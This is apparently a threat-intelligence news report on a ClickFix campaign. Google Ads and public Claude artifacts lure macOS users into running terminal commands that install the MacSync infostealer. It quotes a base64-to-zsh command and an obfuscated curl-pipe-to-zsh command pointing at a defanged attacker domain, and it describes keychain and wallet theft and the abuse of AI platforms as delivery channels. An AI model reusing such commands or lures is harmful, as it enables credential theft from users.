Security researchers have identified a new wave of ClickFix attacks targeting macOS, in which threat actors combine paid Google Ads with public Claude artifacts from Anthropic to distribute the MacSync infostealer. In one case tracked by Moonlock Lab, a single malicious Claude artifact attracted more than 15,600 views, underscoring the scale and reach of the campaign.
ClickFix attacks: persuading users to compromise their own macOS systems
ClickFix is a class of social-engineering attack where victims are coaxed into manually running commands in a console under the pretext of “fixing” or “diagnosing” a problem. Instead of silently dropping malware, the attacker convinces the user to copy and paste a command into the terminal or command line, effectively bypassing many built‑in defenses.
On Windows, ClickFix has typically involved bogus PowerShell commands advertised as ways to repair browser issues, overcome display glitches, or pass a “security verification.” Adversaries frequently simulate BSOD screens, slow down the browser artificially, or present fake CAPTCHAs, then provide a command that supposedly resolves the issue.
Although such activity has historically focused on Windows users, researchers have repeatedly observed ClickFix-style techniques adapted for macOS and Linux. The latest campaign confirms a clear trend: Apple’s ecosystem is now treated as a lucrative target, and attackers are investing in macOS‑specific social engineering.
Abusing Claude artifacts, Medium, and Google Ads in macOS malvertising
Claude artifacts are public objects—such as guides, code snippets, and notes—generated with Anthropic’s LLM and hosted on the claude.ai domain. Although the platform labels them as user-generated and not moderated, many users implicitly trust them more than random blogs because they reside on a well-known AI provider’s domain.
According to Moonlock Lab and AdGuard, threat actors are buying Google search ads for queries like “online DNS resolver,” “macOS CLI disk space analyzer,” “Homebrew,” and other technical keywords. The ad appears at the top of search results, looking highly relevant and legitimate.
Clicking the ad sends users either to a malicious Claude artifact with a “step-by-step” troubleshooting guide or to a fake “Apple support” article hosted on Medium. In both cases, the content is crafted to persuade the victim to copy a terminal command and execute it on macOS as part of the supposed fix.
Malicious macOS terminal commands delivering the MacSync infostealer
Researchers highlight two primary malicious command patterns used in this campaign. The first takes the form:
echo “…” | base64 -D | zsh
Victims are told this is a harmless “service” or “diagnostic” command. In reality, the base64-encoded payload is decoded and piped directly into the default macOS shell zsh, which then executes a loader script.
The second variant looks like this:
true && cur””l -SsLfk –compressed “https://raxelpak[.]com/curl/[hash]” | zsh
Here the standard macOS utility curl is invoked (with the command name obfuscated as cur””l to evade simple filters) to download a remote script and immediately pipe it into zsh for execution. Both approaches ultimately fetch and run a loader for the MacSync malware, an information stealer focused on sensitive data theft.
MacSync behavior: keychain, browser, and crypto wallet theft on macOS
Once running, MacSync contacts its command‑and‑control (C2) server using a hard‑coded token and API key. To blend into normal traffic, it spoofs the User-Agent string to resemble legitimate macOS browser activity, complicating detection at the network layer.
The response from the C2 server is fed directly to osascript, which executes AppleScript commands. This AppleScript logic performs the actual data theft, targeting items such as the macOS keychain, stored browser passwords and cookies, and data from cryptocurrency wallets and other sensitive applications.
Collected information is compressed into /tmp/osalogging.zip and exfiltrated to a2abotnet[.]com/gate via HTTP POST. If the upload fails, MacSync splits the archive into chunks and attempts to resend it up to eight times. After successful exfiltration, the malware cleans up its artifacts to reduce forensic visibility and hinder incident response.
Links to previous macOS malware campaigns and emerging LLM abuse trends
The infrastructure and techniques used in this operation overlap with earlier distribution of the AMOS infostealer, another macOS‑focused threat. In December 2025, security teams observed similar ClickFix campaigns where paid ads pushed seemingly helpful chat sessions with ChatGPT and Grok that ultimately led to malicious commands.
This latest activity leveraging Claude artifacts fits into a broader pattern: attackers are systematically exploiting LLM platforms and user‑generated content as new delivery channels. Combined with paid search advertising, these campaigns take advantage of brand trust in Apple, Google, and popular AI tools to increase the likelihood of compromise—especially among users who still consider macOS “secure by default.”
To mitigate the risk of ClickFix-style attacks on macOS, users should treat any instructions that ask them to run terminal commands—particularly those reached via ads, random blogs, LLM artifacts, or unofficial guides—with strong skepticism. Commands should be verified against trusted sources such as official vendor documentation, reputable developer repositories, or well-known support portals. Keeping macOS fully updated, maintaining Gatekeeper and built‑in protections, and deploying reputable endpoint security tools are equally important. For organizations, combining these technical controls with regular security awareness training on AI tools, malvertising, and console usage is now critical to stopping such campaigns before the first command is ever typed.
